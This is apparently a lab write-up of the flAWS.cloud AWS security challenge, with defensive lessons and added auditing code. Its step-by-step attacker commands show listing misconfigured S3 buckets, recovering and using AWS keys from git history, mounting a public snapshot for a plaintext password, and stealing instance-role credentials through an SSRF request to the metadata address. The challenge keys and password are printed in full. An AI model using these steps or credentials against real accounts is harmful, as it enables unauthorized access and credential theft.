flAWS Walkthrough – AWS S3, IAM, EC2, and Lambda Exploitation

Arbaaz Jamadar

flAWS.cloud Walkthrough – Exploiting AWS Misconfigurations

flAWS.cloud is a hands-on CTF-style challenge created to teach cloud security professionals about real-world AWS misconfigurations and their potential exploitation. This walkthrough explains each step in detail, covering how attackers can enumerate, exploit, and escalate privileges inside AWS environments.

Prerequisites

  1. AWS Account – Free tier is enough.
  2. AWS CLI – Install and configure with an IAM user (never use root).
  3. IAM User – With policies to create/manage S3, EC2, and IAM.
  4. Git – Required to fetch repos and explore leaked commits.

Notes

  • The challenge is hosted in us-west-2.
  • Some tasks require a Linux environment.
  • Always cross-check AWS docs for S3, IAM, EC2, Lambda.
  • Make sure EBS volumes and EC2 instances are in the same region when mounting snapshots.
  • Contact me if you get stuck—I’d be happy to help!

Task 1 – Public S3 Bucket Enumeration

Without any credentials, we attempt to list the bucket:

    aws s3 ls s3://flaws.cloud

  • Discovered secret-dd02c7c.html at:
    http://flaws.cloud.s3.amazonaws.com/secret-dd02c7c.html
  • Security Issue:
    • Public S3 bucket listing should never be enabled.
    • It exposes internal files to unauthenticated users.


Task 2 – Authenticated S3 Enumeration

  • The bucket ACL grants access to the “Authenticated Users” group, so any AWS account (not only the owner’s) can enumerate it with its own credentials:
    aws s3 --profile default ls s3://level2-xxxx.flaws.cloud/
  • Discovered secret-e4443fc.html → leads to Task 3.
  • Security Issue:
    • A misconfigured ACL allows any AWS account to list objects; “Authenticated Users” means every AWS customer, not the bucket owner’s own users.

Task 3 – Secrets in Git Repository on S3

  • We found a .git folder inside the bucket, synced it locally and walked the history:
    aws s3 sync s3://level3-xxxx.flaws.cloud/ .
    git log
    git checkout <commit-id>
  • Found AWS access keys inside access_key.txt in an earlier commit:
    access_key_id: AKIAJ366LIPB4IJKT7SA
    secret_access_key: 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
  • Configured the AWS CLI with the leaked creds and confirmed they work:
    aws configure --profile flaws
    aws --profile flaws s3api list-buckets
  • Security Issue:
    • Never commit AWS keys to Git repos; deleting the file in a later commit does not remove it from history.
    • If leaked, revoke immediately and rotate.
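As an added defensive example (not part of the original writeup), a minimal scanner over `git log -p` output that flags access-key-shaped strings in every commit, including ones whose file was later deleted; the sample log is constructed and its key values are AWS's documented example credentials, not the challenge's.

```python
import re

# Constructed `git log -p` excerpt: a commit that adds a key file and a later
# commit that deletes it. Key values are AWS's published example credentials.
SAMPLE_GIT_LOG = """\
commit 1a2b3c4d
Author: dev <dev@example.com>

    add config

diff --git a/access_key.txt b/access_key.txt
+access_key_id: AKIAIOSFODNN7EXAMPLE
+secret_access_key: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
commit 9f8e7d6c
Author: dev <dev@example.com>

    remove key

diff --git a/access_key.txt b/access_key.txt
-access_key_id: AKIAIOSFODNN7EXAMPLE
"""

# Long-term (AKIA) and temporary (ASIA) access key ids share one shape.
ACCESS_KEY_RE = re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")
# Secret keys are 40 base64-ish chars; only flag them when labelled as such,
# which keeps false positives from hashes and similar strings down.
SECRET_KEY_RE = re.compile(r"(?i)secret[_-]?access[_-]?key\W+([A-Za-z0-9/+=]{40})\b")


def scan_git_log(text):
    """Return (commit, line_no, kind, value) for each credential-looking
    string. Removed (-) lines are scanned as well: a key deleted in a later
    commit is still in the history, so it is still leaked."""
    commit = None
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if line.startswith("commit "):
            commit = line.split()[1]
            continue
        for m in ACCESS_KEY_RE.finditer(line):
            findings.append((commit, n, "access_key_id", m.group(1)))
        for m in SECRET_KEY_RE.finditer(line):
            findings.append((commit, n, "secret_access_key", m.group(1)))
    return findings


if __name__ == "__main__":
    for finding in scan_git_log(SAMPLE_GIT_LOG):
        print(finding)
```

For real repositories, GitLeaks or TruffleHog (recommended below) do this with far more patterns and entropy checks, but the history-wide scan is the same idea.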


Task 4 – Exploiting Public EC2 Snapshots

  • Discovered an EC2 snapshot linked to the IAM user backup by listing snapshots owned by the challenge account:
    aws --profile flaws ec2 describe-snapshots --owner-id 975426262029
  • Created a volume from the public snapshot in our own account (same region and AZ as the instance that will mount it):
    aws ec2 create-volume \
      --availability-zone us-west-2a \
      --region us-west-2 \
      --snapshot-id snap-0b49342abd1bdcb89
  • Attached and mounted the volume → found setupNginx.sh with plaintext creds:
    username: flaws
    password: nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
  • Logged into the hosted website successfully.
  • Security Issue:
    • EC2 snapshots should always be private.
    • Public snapshots expose sensitive data & credentials to every AWS account.
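The exposure behind Tasks 1, 2 and 4 is visible in two API responses, so here is one added audit example (my code, not part of the writeup) that classifies a `get-bucket-acl` document and a `describe-snapshot-attribute` document; both sample documents are constructed in the shape the AWS CLI returns, with placeholder ids.

```python
import json

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"


def public_acl_grants(acl):
    """Return [(who, permission)] for grants in a get-bucket-acl document
    that reach outside the account: AllUsers (Task 1, no credentials needed)
    or AuthenticatedUsers (Task 2, any AWS account at all)."""
    out = []
    for g in acl.get("Grants", []):
        grantee = g.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in (ALL_USERS, AUTH_USERS):
            who = "AllUsers" if grantee["URI"] == ALL_USERS else "AuthenticatedUsers"
            out.append((who, g.get("Permission")))
    return out


def snapshot_is_public(attr):
    """True when a describe-snapshot-attribute createVolumePermission
    document contains the 'all' group (Task 4): anyone can create a volume
    from the snapshot, exactly as the walkthrough does."""
    return any(p.get("Group") == "all" for p in attr.get("CreateVolumePermissions", []))


# Constructed documents (placeholder ids), not real API output.
ACL_DOC = json.loads("""{
  "Owner": {"ID": "owner-id-placeholder"},
  "Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-id-placeholder"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"}, "Permission": "READ"}
  ]}""")
SNAP_DOC = {"SnapshotId": "snap-placeholder", "CreateVolumePermissions": [{"Group": "all"}]}

if __name__ == "__main__":
    # Real use: feed in the JSON from
    #   aws s3api get-bucket-acl --bucket <name>
    #   aws ec2 describe-snapshot-attribute --snapshot-id <id> --attribute createVolumePermission
    print(public_acl_grants(ACL_DOC))   # [('AuthenticatedUsers', 'READ')]
    print(snapshot_is_public(SNAP_DOC))  # True
```

Group ACL grants like these are what S3 Block Public Access and the BucketOwnerEnforced object-ownership setting switch off; a shared snapshot is made private again with `aws ec2 modify-snapshot-attribute --snapshot-id <id> --attribute createVolumePermission --operation-type remove --group-names all`.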


Task 5 – Exploiting EC2 Metadata via SSRF

  • The web app’s /proxy endpoint fetches URLs server-side, which exposes the AWS Instance Metadata Service (IMDS):
    http://<ec2-public-dns>/proxy/169.254.169.254/latest/meta-data
  • Extracted the instance role’s temporary credentials from the metadata path:
    iam/security-credentials/flaws
  • Exported the temporary credentials as environment variables and accessed the next bucket:
    aws s3 ls s3://level6-xxxx.flaws.cloud
  • Security Issue:
    • SSRF that can reach IMDS turns into theft of the instance role’s credentials.
    • Applications should never proxy requests to 169.254.169.254 or other link-local and internal addresses.
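The "block 169.254.169.254" mitigation is easy to get wrong, so here is an added example (my code, not from the writeup) of a destination check for a server-side fetcher like /proxy; it handles the decimal, hex and IPv4-mapped IPv6 spellings of the IMDS address and resolves hostnames through an injectable `resolve` callable so it can be tested offline. The BLOCKED list is my own choice of ranges.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Ranges a server-side fetcher must never reach: link-local (IMDS lives at
# 169.254.169.254), the IMDS IPv6 endpoint fd00:ec2::254, loopback, and
# private/ULA space. Chosen for this example; extend as needed.
BLOCKED = [ipaddress.ip_network(n) for n in (
    "169.254.0.0/16", "fe80::/10", "fd00:ec2::254/128", "127.0.0.0/8",
    "::1/128", "0.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12",
    "192.168.0.0/16", "100.64.0.0/10", "fc00::/7")]


def literal_ip(host):
    """Parse dotted, decimal (2852039166) or hex (0xa9fea9fe) IP literals,
    all of which HTTP clients connect to; None means `host` is a name."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.ip_address(int(host, 0))
    except ValueError:
        return None


def proxy_target_allowed(url, resolve=None):
    """True only if every address `url` points at lies outside BLOCKED.
    `resolve` maps a hostname to its IP strings (default: system resolver).
    Re-check at connect time as well, or DNS rebinding can bypass this."""
    if resolve is None:
        resolve = lambda h: [ai[4][0] for ai in socket.getaddrinfo(h, None)]
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    ip = literal_ip(parts.hostname)
    try:
        addrs = [ip] if ip else [ipaddress.ip_address(a) for a in resolve(parts.hostname)]
    except (socket.gaierror, ValueError):
        return False
    if not addrs:
        return False
    for a in addrs:
        if a.version == 6 and a.ipv4_mapped:      # ::ffff:169.254.169.254
            a = a.ipv4_mapped
        if any(a in net for net in BLOCKED):
            return False
    return True
```

Pair this with IMDSv2 on the instance (`aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required --http-put-response-hop-limit 1`), which stops a plain proxied GET from reading credentials even if the URL filter is bypassed.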

Task 6 – Lambda Privilege Escalation via API Gateway

  • Checked the IAM role & its attached policies, then enumerated Lambda functions:
    aws --profile sec iam list-attached-role-policies --role-name level6
    aws --profile sec lambda list-functions
  • Found Lambda function Level6 and API Gateway ID s33ppypa75; listed its stages:
    aws --profile sec apigateway get-stages --rest-api-id s33ppypa75
  • Stage: prod
  • Invoked the Lambda via API Gateway:
    https://s33ppypa75.execute-api.us-west-2.amazonaws.com/prod/Level6
  • Response revealed the final endpoint:
    http://theend-xxxx.flaws.cloud/d730aa2b/

Challenge Completed 🎉

  • Security Issue:
    • Over-permissive IAM policies + API Gateway integration can be abused to invoke internal Lambda functions.
    • Always enforce least privilege & review IAM policies.
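"Review IAM policies" is the Task 6 lesson, so here is an added example (my code, not the challenge's policy) of a least-privilege audit over a policy document in the shape of the `Document` field returned by `aws iam get-policy-version`; the sample policy and the SENSITIVE action list are constructed for illustration.

```python
import fnmatch

# Constructed policy document (not the real level6 policy from the challenge).
POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::app-bucket-placeholder/*"},
        {"Effect": "Allow", "Action": ["lambda:*", "apigateway:GET"], "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:PassRole", "Resource": "*"},
    ],
}

# Actions that let a principal change who can do what, or run code under
# another role; any of these on Resource "*" is an escalation path.
SENSITIVE = ("iam:*", "iam:PassRole", "iam:Create*", "iam:Attach*", "iam:Put*",
             "lambda:CreateFunction", "lambda:UpdateFunctionCode",
             "lambda:AddPermission", "sts:AssumeRole")


def _as_list(v):
    return v if isinstance(v, list) else [v]


def audit_policy(doc):
    """Return findings as (statement_index, severity, detail). Only Allow
    statements matter; NotAction/NotResource are flagged outright because
    they grant everything except what is listed."""
    findings = []
    for i, st in enumerate(doc.get("Statement", [])):
        if st.get("Effect") != "Allow":
            continue
        if "NotAction" in st or "NotResource" in st:
            findings.append((i, "high", "NotAction/NotResource grants by exclusion"))
            continue
        actions = _as_list(st.get("Action", []))
        wild_res = "*" in _as_list(st.get("Resource", []))
        for a in actions:
            if a == "*" or a.endswith(":*"):
                findings.append((i, "high" if wild_res else "medium", f"wildcard action {a}"))
            elif wild_res and any(fnmatch.fnmatchcase(a, s) for s in SENSITIVE):
                findings.append((i, "high", f"{a} on all resources"))
            elif wild_res:
                findings.append((i, "low", f"{a} on all resources"))
    return findings


if __name__ == "__main__":
    for f in audit_policy(POLICY):
        print(f)
```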

Key Security Lessons

  • S3 Misconfiguration → Public listing exposes sensitive files.

  • Git Repo Secrets → Never commit credentials.

  • Public Snapshots → EC2/EBS volumes can leak private data.

  • IMDS Exposure → Protect against SSRF attacks.

  • IAM Over-Permissions → Leads to privilege escalation.

  • API Gateway + Lambda → Can be exploited if policies are too permissive.

Conclusion

The flAWS.cloud CTF is a perfect way to understand real-world AWS security pitfalls. It highlights how a single misconfiguration (like public S3 or IMDS exposure) can cascade into full account compromise.

Best Practices to Prevent Such Exploits:

  • Enforce least privilege IAM policies.

  • Disable public S3 access by default.

  • Regularly audit IAM, S3, EC2, Lambda configurations.

  • Use tools like AWS Config, Security Hub, ScoutSuite.

  • Implement automated secret scanning for repos (e.g., GitLeaks, TruffleHog).

Related Reads:

AWS IAM Security Best Practices

AWS S3 Security Guidelines

flAWS.cloud Challenge
